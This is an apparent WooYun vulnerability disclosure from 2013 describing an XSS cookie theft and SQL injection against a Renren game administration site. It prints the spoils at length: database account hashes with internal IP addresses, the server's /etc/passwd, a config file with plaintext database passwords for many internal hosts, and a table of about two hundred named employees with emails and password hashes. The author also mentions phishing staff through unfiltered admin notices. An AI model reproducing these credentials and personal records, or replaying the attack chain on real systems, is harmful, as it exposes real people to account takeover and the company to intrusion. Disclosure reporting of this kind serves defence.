当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018510

漏洞标题:人人网游戏XSS+SQL注入+爆路径+列目录,员工信息大量泄漏

相关厂商:人人网

漏洞作者: whirlwind

提交时间:2013-02-07 22:29

修复时间:2013-03-24 22:30

公开时间:2013-03-24 22:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-07: 细节已通知厂商并且等待厂商处理中
2013-02-11: 厂商已经确认,细节仅向厂商公开
2013-02-21: 细节向核心白帽子及相关领域专家公开
2013-03-03: 细节向普通白帽子公开
2013-03-13: 细节向实习白帽子公开
2013-03-24: 细节向公众公开

简要描述:

XSS偷取cookies,还有注入,权限蛮大的哦,能直接load_file('/etc/passwd')
目测拿下wan.renren.com

详细说明:

http://wan.renren.com/service.shtml
首先这里随便找了一个客服,提交时插入XSS代码,似乎名字那里,忘记了,然后cookies就来了
然后进后台,高级管理员哦
爆路径 http://rrcrm.data.io8.org/lib/
/data/web/crm.imop.com/
sql注入 http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
必须验证cookies才能注入

arget: 		http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
Host IP: 60.29.248.160
Powered-by: PHP/5.2.5
Web Server: lighttpd/1.4.13
DB Server: MySQL >=5
Resp. Time(avg): 149 ms
Current User: root@localhost
Sql Version: 5.1.38-community-log
Current DB: CRM
System User: root@localhost
Host Name: TJHY248-160.opi.com
Installation dir: /
DB User & Pass: root:053a9bf72434f7f8:localhost
root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com
xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.227.25
msgweb:32ce979f1810450d:%
gamesum:*04ED80791E1E83935FCFB04DB251B8923CA52276:10%
stat:532a371916879d65:%
gc_imop:*543E075F9BD62E4B2C39F12CD7BDDAA75A6E8A40:10.22.225.%
webcrm:63e483b832b5e91a:%
xiaonei_ts:38e845946c9b5163:10.22.225.110
crm_zl:0e1493ed782f704c:10.4.130.79
ssgc:*A0BBFCF8936A3F109DC2CBB177EB06FF98E7C18D:10.22.225.238
replication:565491d704013245:10.22.225.20
xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.225.105
kaixin_ts:*0AC48CFDD7C65E4137893E7D2CA9CEFA95130238:10.22.225.116
crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.3.32.11
webcrm:*5A7EAE355A763D62D1B53ED34463A18E2EFC3837:10.22.225.28
kaixin_sg:*4F9D6AA51C3DDCEF52A115B296A6BFC49F397541:10.22.227.25
daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.6.57.60
daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.30.33.56
replication:565491d704013245:10.30.32.141
renren_hh:*43AED5659370B63BA30CE41A5EE8D31FBB7A0A36:10.30.34.34
crmsum:*07917BFF5284F50A2D7399560A0110F100CBB23C:10.22.225.29
crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.30.37.160
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.89
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.90
lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.30.33.80
renren_sz:09d725012d72e6ab:10.30.37.22
renren_lzr:09d725012d72e6ab:10.22.227.110
replication:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.%
wangkun:27df606e7932e98c:%
zhenyu.shang:658d4f1d5d32391d:10.%
kettle:565491d704013245:%
Data Bases: information_schema
CRM
CRMUSER
binlogs
mysql
test
testcrm
tongyongcrm
user_classfy


下来找找passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
zabbix:x:500:500:Zabbix User:/home/zabbix:/bin/false
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash


然后是mysql等数据库配置
/data/web/crm.imop.com/config.inc.php

<?php
/**
* 设置数据库连接参数
*/
$cfg['sqlserv'] = 'localhost';
$cfg['sqluser'] = 'root';
$cfg['sqlpass'] = 'crm123li';
$cfg['sqllibr'] = 'CRM';
/**
* 页面TITLE
*/
$cfg['title'] = 'CRM管理系统2011';
/**
* 设置模板路径
*/
$cfg['template'] = 'templates';
$cfg['template_c'] = 'templates_c';
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");//后台算数
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
//校内中心
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
//算数DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
//信息服务器db
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
//分页设置
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
?>


好多
顺便发现个fck
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
另外,进后台后可以修改公告,没有任何过滤,如果我给弄个基础认证钓鱼的话,嘿嘿,也许还能搞到点游戏号
最后说一下,我发现他游戏后台的默认密码全部是123456

漏洞证明:

QQ截图20130207215757.gif


2.gif


realname 	team 	password 	username 	id
,46, e10adc3949ba59abbe56e057f20f883e Min.wang 795
,43,42,39,36,6,4, ca514e5d3ab30b0da3a0e0c09dfc9490 xuelong.chen@renren-inc.com 797
,46, e10adc3949ba59abbe56e057f20f883e Qi.zhao1 796
,43,42,39,36,6,4, 9155dde75497ba1dea7ccfa08a22ffe6 pan.hu1@renren-inc.com 798
,46, 4297f44b13955235245b2497399d7a93 Yue.shu 794
姜瑞华 ,4, e10adc3949ba59abbe56e057f20f883e ruihua.jiang@opi-corp.com 674
bo.gang1 ,38, 5f38df2425932780987944fd6e1112d1 bo.gang1 723
twt ,24,4, 2e9087b02957f5c29d14a8fd492cbeb3 twt 566
wjktest ,31, e10adc3949ba59abbe56e057f20f883e wjktest 574
白小雪 ,43,42,39,36,6,4, e10adc3949ba59abbe56e057f20f883e xiaoxue.bai@renren-inc.com 801
白云 ,34, e10adc3949ba59abbe56e057f20f883e yun.bai@opi-corp.com 436
蔡龙雨 ,36, 539fc5eb51fa336790822a0751b18dfb longyu.cai 601
蔡萌 ,6, e10adc3949ba59abbe56e057f20f883e wb.meng.cai@opi-corp.com 748
曹俊 ,11, e10adc3949ba59abbe56e057f20f883e jun.cao@opi-corp.com 608
曹蕾 ,6, e10adc3949ba59abbe56e057f20f883e wb.lei.cao@opi-corp.com 742
柴留栓 ,4, e10adc3949ba59abbe56e057f20f883e liushuan.chai@opi-corp.com 476
常静 ,6, e10adc3949ba59abbe56e057f20f883e jing.chang@opi-corp.com 88
车臣 ,24, e10adc3949ba59abbe56e057f20f883e chechen 471
陈超 ,11, e10adc3949ba59abbe56e057f20f883e chenchao 363
陈春晖 ,36, e10adc3949ba59abbe56e057f20f883e chunhui.chen@opi-corp.com 696
陈春树 ,6, e10adc3949ba59abbe56e057f20f883e chunshu.chen@opi-corp.com 672
陈佳丽 ,0, e10adc3949ba59abbe56e057f20f883e jiali.chen@opi-corp.com 546
陈金磊 ,44,40,4, e10adc3949ba59abbe56e057f20f883e jinlei.chen@opi-corp.com 832
陈亮 ,24, e10adc3949ba59abbe56e057f20f883e chenliang 544
陈萌萌 ,11, e10adc3949ba59abbe56e057f20f883e mengmeng.chen@opi-corp.com 724
陈鹏亮 ,41,38,37,6,4, e10adc3949ba59abbe56e057f20f883e pengliang.chen@opi-corp.com 227
陈乾 ,36, e10adc3949ba59abbe56e057f20f883e qian.chen@opi-corp.com 669
陈瑞杰 ,48,47,46,45,44,43,42,41,40,39,38,31,6,4, e10adc3949ba59abbe56e057f20f883e chen.ruijie@opi-corp.com 720
陈思伦 ,, e10adc3949ba59abbe56e057f20f883e silun.chen@opi-corp.com 551
陈曦 ,, e10adc3949ba59abbe56e057f20f883e xi-chen@opi-corp.com 400
陈曦 ,4, e10adc3949ba59abbe56e057f20f883e xi.chen1@opi-corp.com 673
陈向飞 ,11, e10adc3949ba59abbe56e057f20f883e xiangfei.chen@opi-corp.com 594
陈晓菡 ,6, e10adc3949ba59abbe56e057f20f883e xiaohan.chen@opi-corp.com 511
陈雄飞 ,11, e10adc3949ba59abbe56e057f20f883e xiongfei.chen@opi-corp.com 656
陈云龙 ,6, e10adc3949ba59abbe56e057f20f883e wb.yunlong.chen@opi-corp.com 808
程长利 ,24, e10adc3949ba59abbe56e057f20f883e chengchangli 775
程佳宝 ,6, e10adc3949ba59abbe56e057f20f883e wb.jiabao.cheng@opi-corp.com 784
程薇 ,11, e10adc3949ba59abbe56e057f20f883e chengwei@opi-corp.com 408
程雯 ,24, e10adc3949ba59abbe56e057f20f883e chengwen 395
迟洪蕊 ,11, e10adc3949ba59abbe56e057f20f883e hongrui.chi@opi-corp.com 515
单单 ,0, f2748f5fedab17bcba3b8e50a77a523d dan.shan@opi-corp.com 86
邓涤洁 ,24, e10adc3949ba59abbe56e057f20f883e dengdijie 816
邓俊海 ,24, e10adc3949ba59abbe56e057f20f883e dengjunhai 411
董亮 ,37, e10adc3949ba59abbe56e057f20f883e liang.dong@opi-corp.com 700
董晓庆 ,11, e10adc3949ba59abbe56e057f20f883e dongxiaoqing 403
窦东栋 ,33, e10adc3949ba59abbe56e057f20f883e dongdong.dou@opi-corp.com 479
窦武龙 ,24, e10adc3949ba59abbe56e057f20f883e douwulong 774
杜宏跃 ,48, e10adc3949ba59abbe56e057f20f883e hongyue.du@opi-corp.com 789
杜薇 ,6, e10adc3949ba59abbe56e057f20f883e wei.du@opi-corp.com 453
杜旭 ,11, e10adc3949ba59abbe56e057f20f883e xu.du@opi-corp.com 560
樊建栋 ,11, e10adc3949ba59abbe56e057f20f883e jiandong.fan@opi-corp.com 697
樊晋元 ,44,40,37,4, e10adc3949ba59abbe56e057f20f883e jinyuan.fan@opi-corp.com 582
樊晓琦 ,48, e10adc3949ba59abbe56e057f20f883e xiaoqi.fan@opi-corp.com 529
范光旭 ,43,42,39,11, e10adc3949ba59abbe56e057f20f883e guangxu.fan@opi-corp.com 703
范昭 ,11, e10adc3949ba59abbe56e057f20f883e zhao.fan@opi-corp.com 423
冯超 ,39, e10adc3949ba59abbe56e057f20f883e chao.feng1@opi-corp.com 800
冯卫鲛 ,11, e10adc3949ba59abbe56e057f20f883e weijiao.feng@opi-corp.com 514
冯小惠 ,44,40,4, e10adc3949ba59abbe56e057f20f883e xiaohui.feng@opi-corp.com 833
付琦 ,45,33, e10adc3949ba59abbe56e057f20f883e qi.fu@opi-corp.com 664
冮博 ,39,38,37,36,6,4, 9c8459932c64783dcb2cd4b8ef51cd24 bo.gang@opi-corp.com 584
高峰 ,43,42,39, e10adc3949ba59abbe56e057f20f883e feng.gao3@renren-inc.com 831
高峰 ,43,42,39, e10adc3949ba59abbe56e057f20f883e feng.gao3@opi-corp.com 826
高璐 ,47,46, df10ef8509dc176d733d59549e7dbfaf lu.gao 735
高润 ,, e10adc3949ba59abbe56e057f20f883e run.gao@opi-corp.com 565
高山 ,24, 1ab017b98e0d01a6622eeee8ca7a1702 gaoshan 470
高爽 ,41,38, e10adc3949ba59abbe56e057f20f883e shuang.gao@renren-inc.com 824
宫乐 ,36,6, e10adc3949ba59abbe56e057f20f883e le.gong@opi-corp.com 580
顾雷 ,8, e10adc3949ba59abbe56e057f20f883e lei.gu@opi-corp.com 161
郭斌 ,24, e10adc3949ba59abbe56e057f20f883e guobin 661
郭芳芳 ,6, e10adc3949ba59abbe56e057f20f883e wb.fangfang.guo@opi-corp.com 803
郭亮 ,11, e10adc3949ba59abbe56e057f20f883e liang.guo@opi-corp.com 149
郭鹏 ,24, e10adc3949ba59abbe56e057f20f883e guopeng 437
郭西征 ,41,38,37,4, e10adc3949ba59abbe56e057f20f883e xizheng.guo@opi-corp.com 695
郭毅华 ,24,4, 46afbc23585c5506d75699425bb07118 guoyihua 381
韩冬 ,11, e10adc3949ba59abbe56e057f20f883e dong.han@opi-corp.com 648
韩涛 ,6, e10adc3949ba59abbe56e057f20f883e wb.tao.han@opi-corp.com 822
何安娜 ,0, 9b8477af34424b3ae5d426fb6d16a48e heanna 488
何瑞雪 ,36, e10adc3949ba59abbe56e057f20f883e ruixue.he@opi-corp.com 693
何珊珊 ,6, e10adc3949ba59abbe56e057f20f883e wb.shanshan.he@opi-corp.com 699
何文 ,44,40,11, e10adc3949ba59abbe56e057f20f883e wen.he@opi-corp.com 638
何宇轩 ,11, e10adc3949ba59abbe56e057f20f883e yuxuan.he@opi-corp.com 660
贺鹏飞 ,11, e10adc3949ba59abbe56e057f20f883e pengfei.he@opi-corp.com 89
赫峰 ,34, e10adc3949ba59abbe56e057f20f883e feng.he@opi-corp.com 550
洪鼎捷 ,34, 22fd3fa8e8637a2c22e221a733bceb52 hongdingjie 630
洪鼎捷 ,37, e10adc3949ba59abbe56e057f20f883e dingjie.hong@opi-corp.com 647
洪峰 ,, e10adc3949ba59abbe56e057f20f883e feng.hong 634
侯杰峰 ,11, e10adc3949ba59abbe56e057f20f883e jiefeng.hou@opi-corp.com 567
候宇 ,6, e10adc3949ba59abbe56e057f20f883e houyu 370
胡睿琪 ,34, e10adc3949ba59abbe56e057f20f883e ruiqi.hu@opi-corp.com 555
胡晓川 ,48, e10adc3949ba59abbe56e057f20f883e xiaochuan.hu@opi-corp.com 791
黄丹 ,41,38,6, e10adc3949ba59abbe56e057f20f883e dan.huang@opi-corp.com 75
黄建兴 ,11, e10adc3949ba59abbe56e057f20f883e jianxing.huang@opi-corp.com 657
黄珊 ,24, fdc1419aab1b1e4a4a80c10293d77e55 huangshan 384
霍子赟 ,34, 42a1c4e4521f50cbb53292651df9e7ec huoziyun 631
纪洪刚 ,4, e10adc3949ba59abbe56e057f20f883e jihonggang 492
贾冰一 ,6, e10adc3949ba59abbe56e057f20f883e bingyi.jia@opi-corp.com 422
贾妍 ,11, e10adc3949ba59abbe56e057f20f883e yan.jia@opi-corp.com 558
江楠 ,43,42,39,36,6,4, f9925e6ee3b5ae2bbcc27808f47319f5 nan.jiang1@renren-inc.com 806
姜刘阳 ,6, e10adc3949ba59abbe56e057f20f883e wb.liuyang.jiang@opi-corp.com 717
姜志鹏 ,34, 91a23961c0adfe65ab9c149f8c8ea02b jiangzhipeng 632
蒋征 ,48, e10adc3949ba59abbe56e057f20f883e zheng.jiang@renren-inc.com 759
徼红艳 ,37,11, e10adc3949ba59abbe56e057f20f883e hongyan.jiao@opi-corp.com 559
金帆 ,48,4, e10adc3949ba59abbe56e057f20f883e fan.jin@opi-corp.com 811
井海泉 ,24,4, e10adc3949ba59abbe56e057f20f883e jinghaiquan 623
康旭 ,24, e10adc3949ba59abbe56e057f20f883e kangxu 815
客服补偿 ,34,4, e10adc3949ba59abbe56e057f20f883e kfbuchang 651
寇楹煊 ,31, e10adc3949ba59abbe56e057f20f883e yingxuan.kou@opi-corp.com 540
李兵 ,11, e10adc3949ba59abbe56e057f20f883e bing.li@opi-corp.com 165
李波 ,48,11,4, e10adc3949ba59abbe56e057f20f883e li-bo@opi-corp.com 655
李畅业 ,, e10adc3949ba59abbe56e057f20f883e changye.li@opi-corp.com 706
李超 ,24, 21536b3e30242c7c304f55f4c40acb4f lichao 541
李超国 ,6, e10adc3949ba59abbe56e057f20f883e chaoguo.li@opi-corp.com 766
李冲 ,, e10adc3949ba59abbe56e057f20f883e chong.li@opi-corp.com 553
李凤祥 ,6, e10adc3949ba59abbe56e057f20f883e wb.fengxiang.li@opi-corp.com 745
李慧 ,0,48,47,46,45,37,36,31,24,11,6,4, e10adc3949ba59abbe56e057f20f883e lihui@opi-corp.com 9
李佳 ,39, e10adc3949ba59abbe56e057f20f883e jia.li1@opi-corp.com 727
李家倩 ,11, e10adc3949ba59abbe56e057f20f883e jiaqian.li@opi-corp.com 670
李家倩 ,4, e10adc3949ba59abbe56e057f20f883e lijiaqian 212
李嘉轩 ,48,46,4, 35e7d2e04afef03da02d4801b5ccea9d jiaxuan.li@renren-inc.com 760
李杰 ,41,38,36,6,4, e10adc3949ba59abbe56e057f20f883e jie.li@opi-corp.com 665
李鍇 ,0, e10adc3949ba59abbe56e057f20f883e likai 493
李磊 ,6, e10adc3949ba59abbe56e057f20f883e lei.li@opi-corp.com 219
李莉 ,24, e10adc3949ba59abbe56e057f20f883e lili 387
李敏 ,0, e10adc3949ba59abbe56e057f20f883e limin@opi-corp.com 68
李楠 ,24, e268443e43d93dab7ebef303bbe9642f linan 385
李少平 ,24, f038985839d66ec5fe58db366adb896c lishaoping 475
李世朋 ,11, e10adc3949ba59abbe56e057f20f883e shipeng.li@opi-corp.com 512
李硕 ,6, e10adc3949ba59abbe56e057f20f883e shuo.li1@opi-corp.com 663
李涛 ,45,6, e10adc3949ba59abbe56e057f20f883e tao.li@opi-corp.com 637
李伟 ,24, e40f01afbb1b9ae3dd6747ced5bca532 liwei 526
李晓旭 ,43,42,39,11, e10adc3949ba59abbe56e057f20f883e xiaoxu.li1@opi-corp.com 707
李雪峰 ,11, e10adc3949ba59abbe56e057f20f883e xuefeng.li1@opi-corp.com 721
李依家 ,44,40,4, c33367701511b4f6020ec61ded352059 yijia.li 732
李勇 ,, e10adc3949ba59abbe56e057f20f883e liyong 705
李智勇 ,24, e10adc3949ba59abbe56e057f20f883e lizhiyong 386
林雪 ,33, e10adc3949ba59abbe56e057f20f883e xue.lin@opi-corp.com 606
蔺京华 ,0,37,36,35,34,33,31,24,11,6,4, d41d8cd98f00b204e9800998ecf8427e jinghua.lin@opi-corp.com 666
刘博洋 ,6, e10adc3949ba59abbe56e057f20f883e wb.boyang.liu@opi-corp.com 821
刘畅 ,4, e10adc3949ba59abbe56e057f20f883e chang.liu@opi-corp.com 92
刘晨 ,11, e10adc3949ba59abbe56e057f20f883e chen.liu@opi-corp.com 534
刘晨鹏 ,6, e10adc3949ba59abbe56e057f20f883e wb.chenpeng.liu@opi-corp.com 713
刘春雪 ,6, e10adc3949ba59abbe56e057f20f883e wb.chunxue.liu@opi-corp.com 820
刘桂林 ,24,4, e10adc3949ba59abbe56e057f20f883e guilin.liu@opi-corp.com 474
刘海舰 ,6, e10adc3949ba59abbe56e057f20f883e wb.haijian.liu@opi-corp.com 807
刘晗 ,34, e10adc3949ba59abbe56e057f20f883e han.liu@opi-corp.com 611
刘贺贺 ,11, e10adc3949ba59abbe56e057f20f883e hehe.liu@opi-corp.com 747
刘辉 ,24, 79258448a61b487b57f418921201b2eb liuhui 380
刘珂 ,44,40,4, e10adc3949ba59abbe56e057f20f883e ke.liu@opi-corp.com 786
刘理 ,, e10adc3949ba59abbe56e057f20f883e li.liu@opi-corp.com 557
刘丽 ,48,4, e10adc3949ba59abbe56e057f20f883e liu.li@opi-corp.com 763
刘亮 ,6, e10adc3949ba59abbe56e057f20f883e wb.liang.liu@opi-corp.com 752
刘璐 ,0,37, e10adc3949ba59abbe56e057f20f883e lu.liu@opi-corp.com 503
刘璐璐 ,6, e10adc3949ba59abbe56e057f20f883e lulu.liu@opi-corp.com 452
刘梦楠 ,44,40,4, e10adc3949ba59abbe56e057f20f883e mengnan.liu@opi-corp.com 787
刘明东 ,11, e10adc3949ba59abbe56e057f20f883e mingdong.liu@opi-corp.com 577
刘明辉 ,24, cfcd208495d565ef66e7dff9f98764da liuminghui 714
刘明鑫 ,36,6, e10adc3949ba59abbe56e057f20f883e mingxin.liu@opi-corp.com 659
刘天宇 ,24, e10adc3949ba59abbe56e057f20f883e liutianyu 409
刘文彦 ,6, e10adc3949ba59abbe56e057f20f883e wb.wenyan.liu@opi-corp.com 750
刘鑫 ,11, e10adc3949ba59abbe56e057f20f883e xin.liu@opi-corp.com 533
刘晏辰 ,37, e10adc3949ba59abbe56e057f20f883e yanchen.liu@opi-corp.com 722
刘喆 ,24, e10adc3949ba59abbe56e057f20f883e liuzhe 716
刘志伟 ,44,40,4, e10adc3949ba59abbe56e057f20f883e zhiwei.liu@opi-corp.com 754
卢旭 ,44,40,33, e10adc3949ba59abbe56e057f20f883e xu.lu1@opi-corp.com 644
吕浩 ,11, e10adc3949ba59abbe56e057f20f883e hao.lv@opi-corp.com 143
吕金妍 ,31, e10adc3949ba59abbe56e057f20f883e jinyan.lv@opi-corp.com 640
罗浩 ,37,36,6, d7f9534ef277733863873f357c6b0e4d hao.luo@opi-corp.com 583
罗林 ,6, e10adc3949ba59abbe56e057f20f883e wb.lin.luo@opi-corp.com 739
罗世妍 ,44,40,11,4, e10adc3949ba59abbe56e057f20f883e shiyan.luo@opi-corp.com 482
马丹丹 ,6, e10adc3949ba59abbe56e057f20f883e dandan.ma@opi-corp.com 829
马栋永 ,47,46,45,44,43,42,41,40,39,38,35, e10adc3949ba59abbe56e057f20f883e dongyong.ma@opi-corp.com 749
马凯宇 ,24, e10adc3949ba59abbe56e057f20f883e makaiyu 776
马路平 ,11,4, e10adc3949ba59abbe56e057f20f883e luping.ma@opi-corp.com 521
马美娟 ,6, e10adc3949ba59abbe56e057f20f883e wb.meijuan.ma@opi-corp.com 823
马莹 ,24, e10adc3949ba59abbe56e057f20f883e maying 383
马颖 ,6, e10adc3949ba59abbe56e057f20f883e ying.ma@opi-corp.com 505
梅辰 ,6, d41d8cd98f00b204e9800998ecf8427e chen.mei@opi-corp.com 702
孟娟 ,11, e10adc3949ba59abbe56e057f20f883e juan.meng@opi-corp.com 463
孟睿 ,6, e10adc3949ba59abbe56e057f20f883e rui.meng@opi-corp.com 780
穆浩然 ,47,46,45,44,43,42,41,40,39,38, e10adc3949ba59abbe56e057f20f883e haoran.mu@opi-corp.com 744
楠洁 ,37,11, e10adc3949ba59abbe56e057f20f883e jie.nan@opi-corp.com 522
牛祺 ,24, c4ca4238a0b923820dcc509a6f75849b niuqi 413
钮鹏凯 ,34, e10adc3949ba59abbe56e057f20f883e pengkai.niu@opi-corp.com 562
潘建宇 ,24, e10adc3949ba59abbe56e057f20f883e panjianyu 715
彭蕊 ,11, e10adc3949ba59abbe56e057f20f883e rui.peng@opi-corp.com 500
蒲岳松 ,45, 8e8811fdc0d1947dc0ab674247db49c1 yuesong.pu 734
钱晨 ,11, e10adc3949ba59abbe56e057f20f883e chen.qian@opi-corp.com 610
钱振华 ,11, e10adc3949ba59abbe56e057f20f883e zhenhua.qian@opi-corp.com 607
邱博 ,24, e10adc3949ba59abbe56e057f20f883e qiubo 431
曲超 ,11, e10adc3949ba59abbe56e057f20f883e chao.qu@opi-corp.com 765
人员001 ,36, e10adc3949ba59abbe56e057f20f883e 人员001 587
人员002 ,36, e10adc3949ba59abbe56e057f20f883e 人员002 588
人员003 ,36, e10adc3949ba59abbe56e057f20f883e 人员003 612
人员004 ,36, e10adc3949ba59abbe56e057f20f883e 人员004 613
人员005 ,36, e10adc3949ba59abbe56e057f20f883e 人员005 614
人员006 ,36, e10adc3949ba59abbe56e057f20f883e 人员006 615
人员007 ,36, e10adc3949ba59abbe56e057f20f883e 人员007 616
人员008 ,36, e10adc3949ba59abbe56e057f20f883e 人员008 617
人员009 ,36, e10adc3949ba59abbe56e057f20f883e 人员009 618
人员010 ,36, e10adc3949ba59abbe56e057f20f883e 人员010 619
人员011 ,36, e10adc3949ba59abbe56e057f20f883e 人员011 620
人员012 ,36, e10adc3949ba59abbe56e057f20f883e 人员012 621
人员013 ,36, e10adc3949ba59abbe56e057f20f883e 人员013 624
人员014 ,36, e10adc3949ba59abbe56e057f20f883e 2865478069@qq.com 676
人员014 ,36, e10adc3949ba59abbe56e057f20f883e 人员014 625
人员015 ,36, e10adc3949ba59abbe56e057f20f883e 2495130598@qq.com 677
人员016 ,36, e10adc3949ba59abbe56e057f20f883e 2416780571@qq.com 678
人员017 ,36, e10adc3949ba59abbe56e057f20f883e 1363371985@qq.com 679
人员018 ,36, e10adc3949ba59abbe56e057f20f883e 1501159187@qq.com 680
人员019 ,36, e10adc3949ba59abbe56e057f20f883e 1271517861@qq.com 681
人员020 ,36, e10adc3949ba59abbe56e057f20f883e 2863320054@qq.com 682
任炎 ,6, e10adc3949ba59abbe56e057f20f883e renyan1 168
施海龙 ,44,40,11, e10adc3949ba59abbe56e057f20f883e hailong.shi@opi-corp.com 642
石海峰 ,37, e10adc3949ba59abbe56e057f20f883e haifeng.shi@opi-corp.com 646
实习生01 ,, e10adc3949ba59abbe56e057f20f883e shixisheng01@opi-corp.com 683
实习生02 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng02@opi-corp.com 684
实习生03 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng03@opi-corp.com 685
实习生04 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng04@opi-corp.com 686
实习生05 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng05@opi-corp.com 687
实习生06 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng06@opi-corp.com 688
实习生07 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng07@opi-corp.com 689
实习生08 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng08@opi-corp.com 690
实习生09 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng09@opi-corp.com 691
实习生1 ,24, e10adc3949ba59abbe56e057f20f883e shixi1 440
实习生10 ,11, e10adc3949ba59abbe56e057f20f883e shixisheng10@opi-corp.com 692
实习生2 ,24, e10adc3949ba59abbe56e057f20f883e shixi2 441
